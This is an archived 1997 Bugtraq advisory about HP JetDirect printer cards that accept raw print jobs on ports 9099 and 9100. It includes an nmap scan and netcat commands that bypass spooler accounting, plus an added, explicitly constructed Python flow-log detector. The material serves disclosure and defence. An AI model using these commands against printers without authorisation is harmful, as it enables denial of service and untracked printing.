JetDirect printer card problem

Description: The JetDirect card with TCP/IP enabled will by default open high ports (9099 and 9100) which can be used to print arbitrary files
Author: Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
Compromise: DoS Attack (send 500 page documents), or free printing if you have access to the printer in question
Vulnerable Systems: Those using JetDirect with TCP/IP enabled and the default unrestricted connections.
Date: 4 October 1997
Notes: Cool! He used my Details

Date: Sat, 4 Oct 1997 18:02:01 -0300
From: Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP Laserjet 4M Plus DirectJet Problem

I don't know if this is a well-known HP printer problem, but
I've found no references to it in the bugtraq archives.

It is possible to bypass lpd and page accounting on an HP
PostScript printer attached to an ethernet card by sending PostScript
directly to tcp ports 9099 and 9100 from any machine over the network.

I've tested on an HP Laserjet 4M Plus DirectJet, connecting to
port 9099 or 9100 tcp and printing PostScript documents.

There is no way to tell the printer to accept connections only
from a range of valid IPs. Also, it is possible to telnet to the
printer and change the printer IP or disable logging. Protecting the
printer inside a firewall appears to be the only safe way.

Finding this kind of printer on a network is quite easy with a
good port scanner. It responds to ping and listens on tcp ports 23,
515, 9099 and 9100.

    # nmap -P -s printer.foo.bar.org -p 23,515,9099,9100
    Starting nmap V 1.25 by Fyodor (fyodor@nmap.org, www.dhp.com/~fyodor/nmap/
    Hint: The -v option notifies you of open ports as they are found.
    Host printer.foo.bar.org (xx.yy.ww.zz) appears to be up ... good.
    Open ports on printer.foo.bar.org (xx.yy.ww.zz):
    Port Number  Protocol  Service
    23           tcp       telnet
    515          tcp       printer
    9099         tcp       unknown
    9100         tcp       unknown

To print a PostScript document just send it to port 9099 or
9100. Netcat will do:

    $ nc printer.foo.bar.org 9099 < huge_document.ps

or

    $ nc printer.foo.bar.org 9100 < huge_document.ps

Can anyone confirm this with other printers? I think the HP 5M is
also vulnerable, but I've not tested it.

Klaus.
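
The post above notes that jobs sent straight to tcp 9099/9100 never pass through lpd or page accounting, so the spooler's own logs will not show them. The following is an added example, not part of the original post: it reads network flow records and reports any connection to a printer on the ports the post names that did not come from the print spooler. The record format, the printer and spooler addresses, and the sample data are all constructed assumptions.

```python
"""Added example: flag printer traffic that bypasses the lpd spooler."""
import ipaddress

# Ports named in the advisory, with the reason each one matters.
WATCHED = {
    9099: "raw print job outside lpd page accounting",
    9100: "raw print job outside lpd page accounting",
    23: "telnet session to printer configuration",
    515: "lpd job sent around the spooler",
}

# Assumed inventory (constructed, documentation address space).
PRINTERS = {ipaddress.ip_address("192.0.2.50")}
SPOOLERS = {ipaddress.ip_address("192.0.2.10")}  # only host allowed to reach printers

# Constructed flow records: timestamp src_ip dst_ip dst_port bytes
SAMPLE_FLOWS = """\
1997-10-04T18:00:01 192.0.2.10 192.0.2.50 515 48213
1997-10-04T18:01:12 192.0.2.77 192.0.2.50 9100 7340032
1997-10-04T18:02:40 198.51.100.9 192.0.2.50 9099 120
1997-10-04T18:03:05 192.0.2.77 192.0.2.50 23 912
1997-10-04T18:03:30 192.0.2.77 192.0.2.20 9100 400
malformed line
"""


def find_bypasses(flow_text, printers=PRINTERS, spoolers=SPOOLERS):
    """Return (timestamp, src, port, bytes, reason) per non-spooler flow to a printer."""
    findings = []
    for line in flow_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed records
        ts, src, dst, port, nbytes = parts
        try:
            src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
            port, nbytes = int(port), int(nbytes)
        except ValueError:
            continue  # skip unparsable addresses or numbers
        if dst_ip in printers and src_ip not in spoolers and port in WATCHED:
            findings.append((ts, src, port, nbytes, WATCHED[port]))
    return findings


if __name__ == "__main__":
    for ts, src, port, nbytes, reason in find_bypasses(SAMPLE_FLOWS):
        print(f"{ts} {src} -> printer:{port} ({nbytes} bytes): {reason}")
```

The byte count is kept in each finding because the post's denial-of-service case (very large documents) shows up as an unusually large transfer to 9099 or 9100.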

This page is part of Fyodor's exploit world.